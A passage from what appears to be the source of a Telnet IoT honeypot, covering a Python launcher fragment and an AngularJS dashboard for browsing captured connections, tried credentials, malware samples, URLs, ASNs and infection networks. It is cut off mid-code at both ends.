None i = 0 while i+1 < len(sys.argv): i += 1 arg = sys.argv[i] if arg == "-c": if i+1 < len(sys.argv): configFile = sys.argv[i+1] print "Using config file " + configFile i += 1 continue else: print "warning: expected argument after \"-c\"" else: action = arg if configFile: config.loadUserConfig(configFile) if action == None: socket.setdefaulttimeout(15) srv = Telnetd(config.get("telnet_addr"), config.get("telnet_port")) signal.signal(signal.SIGINT, signal_handler) srv.run() elif action == "import": fname = sys.argv[2] import_file(fname) elif action == "rerun": fname = sys.argv[2] rerun_file(fname) elif action == "shell": test_shell() else: print "Command " + action + " unknown." ================================================ FILE: html/.gitignore ================================================ db.php apiurl.js ================================================ FILE: html/admin.html ================================================

Login

Add a new user


================================================ FILE: html/asn.html ================================================

ASN Info

Name{{ asn.name }}
Country {{ asn.countryname }}
ASNAS{{ asn.asn }}
Internet Registry{{ REGISTRIES[asn.reg] }}
More Info AS{{ asn.asn }} on bgp.he.net

Connections from AS{{ asn.asn }} more

URLs located in AS{{ asn.asn }}

ConnectionsUrlSample
{{ url.connections }}{{ url.url }}{{ url.sample }}
Coming soon ================================================ FILE: html/common.js ================================================ var fakenames = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt","Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk","Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati","Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn","Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare","Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe","Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat","Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"]; function extractHash() { var table = {}; var values = window.location.hash.substr(1); values = values.split("&"); for (var i = 0; i < values.length; i++) { var tuple = values[i].split("="); var name = tuple[0]; var value = tuple.length > 1 ? tuple[1] : null; table[name] = value; } return table; } function formatDate(date) { d = new Date(date * 1000); return d.toTimeString().replace(/.*(\d{2}:\d{2}:\d{2}).*/, "$1"); } var months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Okt", "Nov", "Dez"]; function formatDay(date) { d = new Date(date * 1000); return d.getDate() + " " + months[d.getMonth()]; } function formatDateTime(date) { if (date == null) return ""; d = new Date(date * 1000); return d.getDate() + "." 
+ (d.getMonth()+1) + " " + d.toTimeString().replace(/.*(\d{2}:\d{2}):\d{2}.*/, "$1"); } function time() { return Math.round(new Date().getTime() / 1000); } function nicenull (str, el) { if (str == null || str == "") return el; else return str; } function short (str, l) { if (str) return str.substring(0, l) + "..."; else return "None"; } function encurl(url) { return btoa(url); } function decurl(url) { return atob(url); } ================================================ FILE: html/connection.html ================================================

Connection Info

Date{{ formatDate(connection.date) }}
Duration{{ connection.duration }} seconds
Network / Malware #{{ connection.network.id }} / {{ connection.network.malware.name != null ? connection.network.malware.name : fakenames[connection.network.malware.id] }}
Honeypot name{{ connection.backend_user }}
IP {{ connection.city + ', ' + connection.countryname }} map
{{ connection.ip }}
AS{{ connection.asn.asn }} {{ connection.asn.name }}
{{ connection.ipblock }}
User : Password "{{ connection.user }}" : "{{ connection.password }}"
Prior Connections

{{ formatDate(associate.date) }} from {{ associate.ip }}

Subsequent Connections

{{ formatDate(associate.date) }} from {{ associate.ip }}

Tags {{ tag.name }}

URLs gathered

Url First Seen Sample
{{ url.url }} {{ formatDate(url.date) }} {{ short(url.sample, 16) }}

Session text show output

Session text does not include non-ASCII characters
{{ event.data }}
================================================ FILE: html/connectionlist-embed.html ================================================
Date IP ASN Country Username Password N⁰ Urls
{{ formatDate(connection.date) }} {{ connection.ip }} {{ connection.asn.asn }} {{ connection.country }} {{ connection.user }} {{ connection.password }} {{ connection.urls }}
================================================ FILE: html/connectionlist.html ================================================

Connections

Filters:

You may use the URL bar to edit filters

Available arguments: ["ipblock", "user", "password", "ip", "country", "asn_id"]

{{ k }} == {{ v }} {{ k == 'country' ? '(' + COUNTRY_LIST[v] + ')' : '' }} {{ $last ? '' : ', ' }}
================================================ FILE: html/countries.js ================================================ var COUNTRY_LIST = {"AF":"Afghanistan","AX":"Åland Islands","AL":"Albania","DZ":"Algeria","AS":"American Samoa","AD":"AndorrA","AO":"Angola","AI":"Anguilla","AQ":"Antarctica","AG":"Antigua and Barbuda","AR":"Argentina","AM":"Armenia","AW":"Aruba","AU":"Australia","AT":"Austria","AZ":"Azerbaijan","BS":"Bahamas","BH":"Bahrain","BD":"Bangladesh","BB":"Barbados","BY":"Belarus","BE":"Belgium","BZ":"Belize","BJ":"Benin","BM":"Bermuda","BT":"Bhutan","BO":"Bolivia","BA":"Bosnia and Herzegovina","BW":"Botswana","BV":"Bouvet Island","BR":"Brazil","IO":"British Indian Ocean Territory","BN":"Brunei Darussalam","BG":"Bulgaria","BF":"Burkina Faso","BI":"Burundi","KH":"Cambodia","CM":"Cameroon","CA":"Canada","CV":"Cape Verde","KY":"Cayman Islands","CF":"Central African Republic","TD":"Chad","CL":"Chile","CN":"China","CX":"Christmas Island","CC":"Cocos (Keeling) Islands","CO":"Colombia","KM":"Comoros","CG":"Congo","CD":"Congo, The Democratic Republic of the","CK":"Cook Islands","CR":"Costa Rica","CI":"Cote D'Ivoire","HR":"Croatia","CU":"Cuba","CY":"Cyprus","CZ":"Czech Republic","DK":"Denmark","DJ":"Djibouti","DM":"Dominica","DO":"Dominican Republic","EC":"Ecuador","EG":"Egypt","SV":"El Salvador","GQ":"Equatorial Guinea","ER":"Eritrea","EE":"Estonia","ET":"Ethiopia","FK":"Falkland Islands (Malvinas)","FO":"Faroe Islands","FJ":"Fiji","FI":"Finland","FR":"France","GF":"French Guiana","PF":"French Polynesia","TF":"French Southern Territories","GA":"Gabon","GM":"Gambia","GE":"Georgia","DE":"Germany","GH":"Ghana","GI":"Gibraltar","GR":"Greece","GL":"Greenland","GD":"Grenada","GP":"Guadeloupe","GU":"Guam","GT":"Guatemala","GG":"Guernsey","GN":"Guinea","GW":"Guinea-Bissau","GY":"Guyana","HT":"Haiti","HM":"Heard Island and Mcdonald Islands","VA":"Holy See (Vatican City State)","HN":"Honduras","HK":"Hong 
Kong","HU":"Hungary","IS":"Iceland","IN":"India","ID":"Indonesia","IR":"Iran, Islamic Republic Of","IQ":"Iraq","IE":"Ireland","IM":"Isle of Man","IL":"Israel","IT":"Italy","JM":"Jamaica","JP":"Japan","JE":"Jersey","JO":"Jordan","KZ":"Kazakhstan","KE":"Kenya","KI":"Kiribati","KP":"Korea, Democratic People'S Republic of","KR":"Korea, Republic of","KW":"Kuwait","KG":"Kyrgyzstan","LA":"Lao People'S Democratic Republic","LV":"Latvia","LB":"Lebanon","LS":"Lesotho","LR":"Liberia","LY":"Libyan Arab Jamahiriya","LI":"Liechtenstein","LT":"Lithuania","LU":"Luxembourg","MO":"Macao","MK":"Macedonia, The Former Yugoslav Republic of","MG":"Madagascar","MW":"Malawi","MY":"Malaysia","MV":"Maldives","ML":"Mali","MT":"Malta","MH":"Marshall Islands","MQ":"Martinique","MR":"Mauritania","MU":"Mauritius","YT":"Mayotte","MX":"Mexico","FM":"Micronesia, Federated States of","MD":"Moldova, Republic of","MC":"Monaco","MN":"Mongolia","MS":"Montserrat","MA":"Morocco","MZ":"Mozambique","MM":"Myanmar","NA":"Namibia","NR":"Nauru","NP":"Nepal","NL":"Netherlands","AN":"Netherlands Antilles","NC":"New Caledonia","NZ":"New Zealand","NI":"Nicaragua","NE":"Niger","NG":"Nigeria","NU":"Niue","NF":"Norfolk Island","MP":"Northern Mariana Islands","NO":"Norway","OM":"Oman","PK":"Pakistan","PW":"Palau","PS":"Palestinian Territory, Occupied","PA":"Panama","PG":"Papua New Guinea","PY":"Paraguay","PE":"Peru","PH":"Philippines","PN":"Pitcairn","PL":"Poland","PT":"Portugal","PR":"Puerto Rico","QA":"Qatar","RE":"Reunion","RO":"Romania","RU":"Russian Federation","RW":"RWANDA","SH":"Saint Helena","KN":"Saint Kitts and Nevis","LC":"Saint Lucia","PM":"Saint Pierre and Miquelon","VC":"Saint Vincent and the Grenadines","WS":"Samoa","SM":"San Marino","ST":"Sao Tome and Principe","SA":"Saudi Arabia","SN":"Senegal","CS":"Serbia and Montenegro","SC":"Seychelles","SL":"Sierra Leone","SG":"Singapore","SK":"Slovakia","SI":"Slovenia","SB":"Solomon Islands","SO":"Somalia","ZA":"South Africa","GS":"South Georgia and the South 
Sandwich Islands","ES":"Spain","LK":"Sri Lanka","SD":"Sudan","SR":"Suriname","SJ":"Svalbard and Jan Mayen","SZ":"Swaziland","SE":"Sweden","CH":"Switzerland","SY":"Syrian Arab Republic","TW":"Taiwan, Province of China","TJ":"Tajikistan","TZ":"Tanzania, United Republic of","TH":"Thailand","TL":"Timor-Leste","TG":"Togo","TK":"Tokelau","TO":"Tonga","TT":"Trinidad and Tobago","TN":"Tunisia","TR":"Turkey","TM":"Turkmenistan","TC":"Turks and Caicos Islands","TV":"Tuvalu","UG":"Uganda","UA":"Ukraine","AE":"United Arab Emirates","GB":"United Kingdom","US":"United States","UM":"United States Minor Outlying Islands","UY":"Uruguay","UZ":"Uzbekistan","VU":"Vanuatu","VE":"Venezuela","VN":"Viet Nam","VG":"Virgin Islands, British","VI":"Virgin Islands, U.S.","WF":"Wallis and Futuna","EH":"Western Sahara","YE":"Yemen","ZM":"Zambia","ZW":"Zimbabwe", "EU": "European Union"}; ================================================ FILE: html/fancy/connhash/index.html ================================================ Network | Hierarchical layout
================================================ FILE: html/fancy/graph/index.html ================================================

================================================ FILE: html/img/LICENSE ================================================ Bee Icon by alican https://thenounproject.com/search/?q=bee&i=573797 CC BY 3.0 (https://creativecommons.org/licenses/by/3.0/us/) ================================================ FILE: html/img/flags/LICENSE ================================================ Flag icons - http://www.famfamfam.com These icons are public domain, and as such are free for any use (attribution appreciated but not required). Note that these flags are named using the ISO3166-1 alpha-2 country codes where appropriate. A list of codes can be found at http://en.wikipedia.org/wiki/ISO_3166-1_alpha-2 If you find these icons useful, please donate via paypal to mjames@gmail.com (or click the donate button available at http://www.famfamfam.com/lab/icons/silk) Contact: mjames@gmail.com ================================================ FILE: html/index.html ================================================
================================================ FILE: html/js/angular-vis.js ================================================ angular.module('ngVis', []) .factory('VisDataSet', function () { 'use strict'; return function (data, options) { // Create the new dataSets return new vis.DataSet(data, options); }; }) /** * TimeLine directive */ .directive('visTimeline', function () { 'use strict'; return { restrict: 'EA', transclude: false, scope: { data: '=', options: '=', events: '=' }, link: function (scope, element, attr) { var timelineEvents = [ 'rangechange', 'rangechanged', 'timechange', 'timechanged', 'select', 'doubleClick', 'click', 'contextmenu' ]; // Declare the timeline var timeline = null; scope.$watch('data', function () { // Sanity check console.log(scope.data); if (scope.data == null) { return; } // If we've actually changed the data set, then recreate the graph // We can always update the data by adding more data to the existing data set if (timeline != null) { timeline.destroy(); } // Create the timeline object console.log(scope.data); timeline = new vis.Timeline(element[0], scope.data.items, scope.data.groups, scope.options); // Attach an event handler if defined angular.forEach(scope.events, function (callback, event) { if (timelineEvents.indexOf(String(event)) >= 0) { timeline.on(event, callback); } }); // onLoad callback if (scope.events != null && scope.events.onload != null && angular.isFunction(scope.events.onload)) { scope.events.onload(timeline); } }); scope.$watchCollection('options', function (options) { if (timeline == null) { return; } timeline.setOptions(options); }); } }; }) /** * Directive for network chart. 
*/ .directive('visNetwork', function () { return { restrict: 'EA', transclude: false, scope: { data: '=', options: '=', events: '=' }, link: function (scope, element, attr) { var networkEvents = [ 'click', 'doubleclick', 'oncontext', 'hold', 'release', 'selectNode', 'selectEdge', 'deselectNode', 'deselectEdge', 'dragStart', 'dragging', 'dragEnd', 'hoverNode', 'blurNode', 'zoom', 'showPopup', 'hidePopup', 'startStabilizing', 'stabilizationProgress', 'stabilizationIterationsDone', 'stabilized', 'resize', 'initRedraw', 'beforeDrawing', 'afterDrawing', 'animationFinished' ]; var network = null; scope.$watch('data', function () { // Sanity check if (scope.data == null) { return; } // If we've actually changed the data set, then recreate the graph // We can always update the data by adding more data to the existing data set if (network != null) { network.destroy(); } // Create the graph2d object network = new vis.Network(element[0], scope.data, scope.options); // Attach an event handler if defined angular.forEach(scope.events, function (callback, event) { if (networkEvents.indexOf(String(event)) >= 0) { network.on(event, callback); } }); // onLoad callback if (scope.events != null && scope.events.onload != null && angular.isFunction(scope.events.onload)) { scope.events.onload(graph); } }); scope.$watchCollection('options', function (options) { if (network == null) { return; } network.setOptions(options); }); } }; }) /** * Directive for graph2d. 
*/ .directive('visGraph2d', function () { 'use strict'; return { restrict: 'EA', transclude: false, scope: { data: '=', options: '=', events: '=' }, link: function (scope, element, attr) { var graphEvents = [ 'rangechange', 'rangechanged', 'timechange', 'timechanged', 'finishedRedraw' ]; // Create the chart var graph = null; scope.$watch('data', function () { // Sanity check if (scope.data == null) { return; } // If we've actually changed the data set, then recreate the graph // We can always update the data by adding more data to the existing data set if (graph != null) { graph.destroy(); } // Create the graph2d object graph = new vis.Graph2d(element[0], scope.data.items, scope.data.groups, scope.options); // Attach an event handler if defined angular.forEach(scope.events, function (callback, event) { if (graphEvents.indexOf(String(event)) >= 0) { graph.on(event, callback); } }); // onLoad callback if (scope.events != null && scope.events.onload != null && angular.isFunction(scope.events.onload)) { scope.events.onload(graph); } }); scope.$watchCollection('options', function (options) { if (graph == null) { return; } graph.setOptions(options); }); } }; }) ; ================================================ FILE: html/network.html ================================================

Network Info

id#{{ network.id }}
Malware{{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }} see
Connections{{ network.firstconns }} / {{ network.connections }} from {{ formatDate(network.firsttime) }} to {{ formatDate(network.lasttime) }} see all
Urls{{ network.urls }}
Samples{{ network.samples }}
Initial Connections per Hour

Connections by honeypot

Name Connections
{{ name }} {{ count }}

Network graph load graph

================================================ FILE: html/networks.html ================================================

Networks

Initial Connections per Hour
# Malware N⁰ initial Conn's N⁰ Urls N⁰ Samples
#{{network.id}} {{ network.malware.name != null ? network.malware.name : fakenames[network.malware.id] }} {{ network.firstconns }} {{ network.urls }} {{ network.samples }}
================================================ FILE: html/overview.html ================================================

This is the start page of this installation of the Telnet-IoT-Honeypot.
More info: https://github.com/Phype/telnet-iot-honeypot

Latest Urls

Url Date
{{ url.url }} {{ formatDate(url.date) }}

Latest Samples

Name Size (Bytes) First Seen
{{ sample.name }} {{ sample.length }} {{ formatDate(sample.date) }}

Latest Connections more

Date Country Username Password
{{ formatDate(connection.date) }} {{ connection.country }} {{ connection.user }} {{ connection.password }}

All Connections by Country
Click on a country to see all connections
================================================ FILE: html/sample.html ================================================

Sample Info

First seen{{ formatDate(sample.date) }}
First seen file name{{ sample.name }}
File size{{ sample.length }} Bytes
SHA256{{ sample.sha256 }}
Virustotal result {{ sample.result }} Unknown, search yourself
Network / Malware #{{ sample.network.id }} / {{ sample.network.malware.name != null ? sample.network.malware.name : fakenames[sample.network.malware.id] }}

Download Info

{{ sample.info }}

Downloaded from

Url Date N⁰ Connections
{{ url.url }} {{ formatDate(url.date) }} {{ url.connections.length }}
================================================ FILE: html/sample.js ================================================ var isMobile = false; //initiate as false // device detection if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|ipad|iris|kindle|Android|Silk|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(navigator.userAgent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 
)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(navigator.userAgent.substr(0,4))) isMobile = true; var app = angular.module('honey', ["ngRoute", "chart.js", "ngVis"]); app.config(function($routeProvider) { $routeProvider .when("/samples", { templateUrl : "samples.html", controller : "samples" }) .when("/sample/:sha256", { templateUrl : "sample.html", controller : "sample" }) .when("/urls", { templateUrl : "urls.html", controller : "urls" }) .when("/url/:url", { templateUrl : "url.html", controller : "url" }) .when("/tag/:tag", { templateUrl : "tag.html", controller : "tag" }) .when("/connection/:id", { templateUrl : "connection.html", controller : "connection" }) .when("/asn/:asn", { templateUrl : "asn.html", controller : "asn" }) .when("/networks", { templateUrl : "networks.html", controller : "networks" }) .when("/network/:id", { templateUrl : "network.html", controller : "network" }) .when("/connections", { templateUrl : "connectionlist.html", controller : "connectionlist" }) .when("/tags", { templateUrl : "tags.html", controller : "tags" }) .when("/admin", { templateUrl : "admin.html", controller : "admin" }) .when("/", { templateUrl : "overview.html", controller : "overview" }) .otherwise({ template: '

Error

View not found.
Go to index' }); }); app.controller('overview', function($scope, $http, $routeParams, $location) { $scope.urls = null; $scope.samples = null; $scope.connections = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $scope.chart_options = { "animation": isMobile ? false : {} }; $http.get(api + "/url/newest").then(function (httpResult) { $scope.urls = httpResult.data; }); $http.get(api + "/sample/newest").then(function (httpResult) { $scope.samples = httpResult.data; }); $http.get(api + "/connections").then(function (httpResult) { $scope.connections = httpResult.data; }); $http.get(api + "/connection/statistics/per_country").then(function (httpResult) { httpResult.data.sort(function(a, b) { return b[0] - a[0] }); $scope.country_stats_values = httpResult.data.map(function(x) {return x[0]}); $scope.country_stats_labels = httpResult.data.map(function(x) {return COUNTRY_LIST[x[1]]}); $scope.country_stats_data = httpResult.data.map(function(x) {return x[1]}); }); $scope.clickchart_countries = function(a,b,c,d,e) { var c = $scope.country_stats_data[c._index]; $location.path("/connections").search({country: c}); $scope.$apply() }; }); app.controller('samples', function($scope, $http, $routeParams) { $scope.samples = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $http.get(api + "/sample/newest").then(function (httpResult) { $scope.samples = httpResult.data; }); }); app.controller('sample', function($scope, $http, $routeParams) { $scope.sample = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $scope.short = function (str) { if (str) return str.substring(0, 16) + "..."; else return "None"; }; var sha256 = 
$routeParams.sha256; $http.get(api + "/sample/" + sha256).then(function (httpResult) { $scope.sample = httpResult.data; }); }); app.controller('urls', function($scope, $http, $routeParams) { $scope.url = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $http.get(api + "/url/newest").then(function (httpResult) { $scope.urls = httpResult.data; }); }); app.controller('tags', function($scope, $http, $routeParams) { $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; $http.get(api + "/tags").then(function (httpResult) { $scope.tags = httpResult.data; }); }); var graph_accumulate_hours = 6; var graph_tstep = 60 * 60 * graph_accumulate_hours; function roundDate(date) { return Math.floor(date / graph_tstep); }; function network_graph_data(networks) { var firsttime = +Infinity; var lasttime = -Infinity; var datasets = []; for (var i = 0; i < networks.length; i++) { var network = networks[i]; var firsttime_net = Math.min.apply(null, network.connectiontimes); var lasttime_net = Math.max.apply(null, network.connectiontimes); firsttime = Math.min(firsttime, firsttime_net); lasttime = Math.min(lasttime, lasttime_net); } var first = roundDate(firsttime); var last = roundDate(lasttime); var now = time(); for (var j = 0; j < networks.length; j++) { var network = networks[j]; var data = new Array((roundDate(now) - first) + 1).fill(0); for (var i = 0; i < network.connectiontimes.length; i++) { var t = network.connectiontimes[i]; var r = roundDate(now - t); data[r] += (1/graph_accumulate_hours); } data.reverse(); data = data.map(function (x) {return Math.round(x*100)/100;}); datasets.push(data); } var labels = datasets[0].map(function(v,i,a) { var tdiff = (a.length-i-1) * graph_tstep; return formatDateTime(now - tdiff); }); return { "datasets": datasets, 
"labels": labels, "firsttime": firsttime, "lasttime": lasttime }; } app.controller('networks', function($scope, $http, $routeParams) { $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; var networks_show_graph = 4; var networks_got = 0; var networks_requested = 0; $http.get(api + "/networks").then(function (httpResult) { $scope.networks = httpResult.data; for (var i = 0; i < $scope.networks.length; i++) { var item = $scope.networks[i]; item.order = item.firstconns; } $scope.networks.sort(function (a, b) { return a.order-b.order; }); $scope.networks.reverse(); networks_requested = Math.min(networks_show_graph, $scope.networks.length); $scope.networks_graph = []; $scope.timechart_series = []; $http.get(api + "/network/biggest_history").then(function (httpResult) { var nets = httpResult.data; $scope.timechart_data = []; for (var i = 0; i < nets.length; i++) { $scope.timechart_data.push( nets[i].data.map(function(x){ return x[1]; }) ); $scope.timechart_series.push(nets[i].network.malware.name + " #" + nets[i].network.id); } $scope.timechart_labels = nets[0].data.map(function(x){ return formatDay(x[0]); }); console.log($scope.timechart_data); console.log($scope.timechart_labels); networks_got = nets.length; }); }); $scope.draw = function() { var ret = network_graph_data($scope.networks_graph); $scope.timechart_data = ret.datasets; $scope.timechart_labels = ret.labels; }; $scope.filterNoSamples = function(network) { return true; // network.samples.length > 0; }; $scope.timechart_options = { "animation": isMobile ? 
false : {}, "responsive": true, "maintainAspectRatio": false, legend: { display: true, position: 'top', }, elements: { line: { fill: false } } }; }); app.controller('network', function($scope, $http, $routeParams) { $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; var id = $routeParams.id; $http.get(api + "/network/" + id).then(function (httpResult) { $scope.network = httpResult.data; var ret = network_graph_data([$scope.network]); $scope.network.firsttime = ret.firsttime; $scope.network.lasttime = ret.lasttime; $scope.timechart_data = ret.datasets; $scope.timechart_labels = ret.labels; }); $scope.timechart_options = { "animation": isMobile ? false : {}, "responsive": true, "maintainAspectRatio": false, }; $scope.graph_events = { "click": function(ev) { if (ev.nodes.length == 1) { var n = ev.nodes[0]; var d = n.substr(2); var link = null; if (n.startsWith("i:")) link = "#/connections?ip=" + d; if (n.startsWith("s:")) link = "#/sample/" + d; if (n.startsWith("u:")) link = "#/url/" + encurl(d); window.location.href = link; } } }; $scope.graph_options = { "interaction": { "tooltipDelay": 0 }, }; $scope.graph_data = { "nodes": [], "edges": [] }; $scope.graph_enabled = false; $scope.loadgraph = function() { var graph_nodes = []; var graph_nodes_set = {}; var node = function(n) { if (! 
(n in graph_nodes_set)) { var color = "#dddddd"; // ip if (n.startsWith("s:")) color = "#ffbbbb"; // sample if (n.startsWith("u:")) color = "#bbbbff"; // url graph_nodes.push({ "id": n, "label": "", "title": n.substring(2), "color": color }); graph_nodes_set[n] = true; } }; var graph_edges = $scope.network.has_infected.map(function(e) { node(e[0]); node(e[1]); return { "from": e[0], "to": e[1], "id": e[0] + "-" + e[1] }; }); $scope.graph_data = { "nodes": graph_nodes, "edges": graph_edges }; $scope.graph_enabled = true; }; }); app.controller('url', function($scope, $http, $routeParams) { $scope.url = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; var url = $routeParams.url; $http.get(api + "/url/" + url).then(function (httpResult) { $scope.url = httpResult.data; $scope.url.countryname = COUNTRY_LIST[$scope.url.country]; }); }); app.controller('tag', function($scope, $http, $routeParams) { $scope.tag = null; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.fakenames = fakenames; var tag = $routeParams.tag; $http.get(api + "/tag/" + tag).then(function (httpResult) { $scope.tag = httpResult.data; $scope.connections = $scope.tag.connections; }); }); app.controller('connection', function($scope, $http, $routeParams) { $scope.connection = null; $scope.lines = []; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.displayoutput = true; $scope.fakenames = fakenames; var id = $routeParams.id; $http.get(api + "/connection/" + id).then(function (httpResult) { $scope.connection = httpResult.data; $scope.connection.countryname = COUNTRY_LIST[$scope.connection.country]; var last_i = $scope.connection.stream.length - 1; $scope.connection.duration = 
$scope.connection.stream[last_i].ts; }); }); app.controller('connectionlist', function($scope, $http, $routeParams, $location) { $scope.connection = null; $scope.lines = []; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.COUNTRY_LIST = COUNTRY_LIST; $scope.fakenames = fakenames; $scope.filter = $routeParams; var url = api + "/connections?"; for (key in $routeParams) { url = url + key + "=" + $routeParams[key] + "&"; } $http.get(url).then(function (httpResult) { $scope.connections = httpResult.data; $scope.connections.map(function(connection) { connection.contryname = COUNTRY_LIST[connection.country]; return connection; }); }); $scope.nextpage = function() { var filter = $scope.filter; filter['older_than'] = $scope.connections[$scope.connections.length - 1].date; $location.path("/connections").search(filter); $scope.$apply(); }; }); app.controller('asn', function($scope, $http, $routeParams, $location) { $scope.connection = null; $scope.lines = []; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.COUNTRY_LIST = COUNTRY_LIST; $scope.REGISTRIES = { "arin": "American Registry for Internet Numbers", "ripencc": "RIPE Network Coordination Centre", "lacnic": "Latin America and Caribbean Network Information Centre", "afrinic": "African Network Information Centre", "apnic": "Asia-Pacific Network Information Centre" }; $scope.fakenames = fakenames; var asn = $routeParams.asn; $scope.filter = { "asn_id" : asn}; $http.get(api + "/asn/" + asn).then(function (httpResult) { $scope.asn = httpResult.data; $scope.asn.countryname = COUNTRY_LIST[$scope.asn.country]; $scope.connections = $scope.asn.connections.sort(function(x, y) {return y.date - x.date} ).slice(0,8); $scope.urls = $scope.asn.urls.sort(function(x, y) {return y.date - x.date} ).slice(0,8); }); }); app.controller('admin', function($scope, 
